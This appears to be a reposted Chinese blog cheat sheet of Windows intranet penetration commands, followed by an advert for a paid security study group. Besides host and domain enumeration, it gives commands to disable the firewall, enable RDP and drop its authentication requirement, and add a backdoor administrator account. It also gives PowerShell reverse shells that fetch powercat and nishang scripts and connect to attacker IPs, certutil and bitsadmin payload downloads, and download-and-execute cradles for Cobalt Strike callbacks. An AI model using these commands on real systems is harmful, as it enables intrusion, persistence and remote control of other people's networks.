Windows内网渗透信息搜集命令总汇

admin 2021年11月13日11:19:43评论71 views字数 4526阅读15分5秒阅读模式

请点击上面 Windows内网渗透信息搜集命令总汇 一键关注!

内容来源:原文链接

Windows内网渗透信息搜集命令总汇


一、正文

前几天面试的时候被师傅问到了这个问题,当时不是很会,现在来学学


二、本机信息收集

1、查询网络配置信息

ipconfig /all


2、查询本机的服务信息

wmic service list brief

Windows内网渗透信息搜集命令总汇


3、查询系统信息

systeminfo

Windows内网渗透信息搜集命令总汇


4、查询进程列表

tasklist / wmic process list brief

Windows内网渗透信息搜集命令总汇


5、查看计划任务

schtasks /query /fo LIST /v 列出计划任务详细信息


6、查看主机开机时间

net statistics workstation

Windows内网渗透信息搜集命令总汇


7、用户相关

net user 查看所有用户
net localgroup administrators 获取本地管理员信息


8、查看端口列表

netstat -ano


9、查看已打补丁

wmic qfe get Caption,Description,HotFixID,InstalledOn


10、查看共享列表

net share 查看本机共享列表和可访问的域共享列表
wmic share get name,path,status 查找共享列表


11、路由表和arp高速缓存表

route print 路由表
arp -a arp高速缓存表


12、防火墙

netsh firewall set opmode disable 关闭防火墙(Windows Server 2003 以前的版本)

netsh advfirewall set allprofiles state off 关闭防火墙(Windows Server 2003 以后的版本)

netsh firewall show config 查看防火墙配置
如果上面的命令被弃用,则使用
netsh advfirewall firewall show rule name=all

根据参考,可以使用这个wmic一键获取本机信息http://www.fuzzysecurity.com/scripts/files/wmic_info.rar


三、域信息收集

1、权限查看

whoami /all 查看自己的详细权限
net user xxx /domain 查看域内指定用户的权限


2、判断是否存在域

.net time /domain 若出现以下情况则不存在域

Windows内网渗透信息搜集命令总汇

若是报错:发生系统错误5,则存在域,但该用户不是域用户

若是以下情况则说明存在域且已经在域中

Windows内网渗透信息搜集命令总汇


3、查看域的名字

net config workstation

Windows内网渗透信息搜集命令总汇

nslookup -type=srv _ldap._tcp

Windows内网渗透信息搜集命令总汇

这个很爽,域控主机名和IP一块弄出来了


4、探测域内存活主机

(1).使用工具 nbtscan http://www.unixwiz.net/tools/nbtscan.html

(2).查看arp高速缓存表

arp -a

Windows内网渗透信息搜集命令总汇

(3).ICMP协议探测(逐个ping)

这个贼慢,但是不用下载其他应用

for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.1.%I | findstr "TTL"

(4).nmap直接开扫

(5).meterpreter会话中执行 run windows/gather/enum_ad_computers


5、扫描域内开放端口

(1).nmap

nmap 192.168.1.0/24

(2).工具 S扫描器

(3).自写脚本

#python3 慢的一批
import socket

def get_ip_status(ip,port):
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
server.connect((ip,port))
print('{0} port {1} is open'.format(ip, port))
except Exception as err:
print('{0} port {1} is not open'.format(ip,port))
finally:
server.close()

if __name__ == '__main__':
host = '172.16.0.198'
for port in range(20,100):
get_ip_status(host,port)


6、域内基本信息

net group “domain computers” /domain 查询所有域成员计算机列表
net view /domain:HACHE 查询域内所有主机
net accounts /domain 获取域密码信息
nltest /domain_trusts 获取域信任信息
nltest /DCLIST:hacke 查看域控制器机器名
Nslookup -type=SRV_ldap._tcp 查看域控制器的主机名


7、域用户信息收集

net user /domain 向域控制器查询域内用户列表
wmic useraccount get /all 获取域内用户详细信息
net localgroup administrators 查询本地管理员用户
net group “domain admins” /domain 查询域管理员用户
net group “Enterprise admins” /domain 查询管理员用户组


8、本机wmic查杀软

WMIC /Node:localhost /Namespace:\rootSecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
or

WMIC /namespace:rootsecuritycenter2 path antivirusproduct GET displayName,productState, pathToSignedProductExe


9、开3389

REG ADD HKLMSYSTEMCurrentControlSetControlTerminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f


10、用户增删改查

net user username password /add 加用户

net localgroup administrators username /add 添加XX到管理员账户


11、一些喜欢用的

Windows 反弹shell

powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 192.168.1.4 -p 9999 -e cmd

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.203.140 -port 6666

wmic 查杀软

WMIC /namespace:\rootsecuritycenter2 path antivirusproduct GET displayName,productState, pathToSignedProductExe

WMIC /Node:localhost /Namespace:\rootSecurityCenter2 Path AntiVirusProduct Get displayName /Format:List

开3389

REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

wmic /namespace:\rootcimv2terminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 0

常见杀软进程名
https://blog.csdn.net/weixin_39997829/article/details/92666552

cmd下载

bitsadmin /transfer n http://www.xx.com/code.jpg c:userssdypdesktopff.jpg

C:Temp>certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt
C:Temp>certutil.exe -decode bad.txt bad.exe

获取盘符

wmic logicaldisk where drivetype=3 get deviceid


12、ps cs 上线

powershell.exe -c IEX((new-object net.webclient).downloadstring('http://xxx/a.ps1'))

powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex"

powershell -exec bypass -f \webdavserverfolderpayload.ps1 (smb)
Windows内网渗透信息搜集命令总汇
「天億网络安全」 知识星球 一个网络安全学习的星球!星球主要分享、整理、原创编辑等网络安全相关学习资料,一个真实有料的网络安全学习平台,大家共同学习、共同进步!

知识星球定价:199元/年,(服务时间为一年,自加入日期顺延一年)。

如何加入:扫描下方二维码,扫码付费即可加入。

加入知识星球的同学,请加我微信,拉您进VIP交流群!

Windows内网渗透信息搜集命令总汇

朋友都在看

▶️等保2.0丨2021 必须了解的40个问题

▶️等保2.0 三级 拓扑图+设备套餐+详解

▶️等保2.0 二级 拓扑图+设备套餐+详解

▶️等保2.0 测评  二级系统和三级系统多长时间测评一次?

▶️等保2.0系列安全计算环境之数据完整性、保密性测评

▶️等保医疗|全国二级、三乙、三甲医院信息系统安全防护设备汇总

▶️国务院:不符合网络安全要求的政务信息系统未来将不给经费

▶️等级保护、风险评估和安全测评三者的区别

▶️分保、等保、关保、密码应用对比详解

▶️汇总 | 2020年发布的最重要网络安全标准(下载)

天億网络安全

【欢迎收藏分享到朋友圈,让更多朋友了解网络安全,分享也是一种美德!】

Windows内网渗透信息搜集命令总汇

↑↑↑长按图片识别二维码关註↑↑↑


欢迎扫描关注【天億网络安全】公众号,及时了解更多网络安全知识

本文始发于微信公众号(天億网络安全):Windows内网渗透信息搜集命令总汇

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年11月13日11:19:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Windows内网渗透信息搜集命令总汇http://cn-sec.com/archives/466034.html

发表评论

匿名网友 填写信息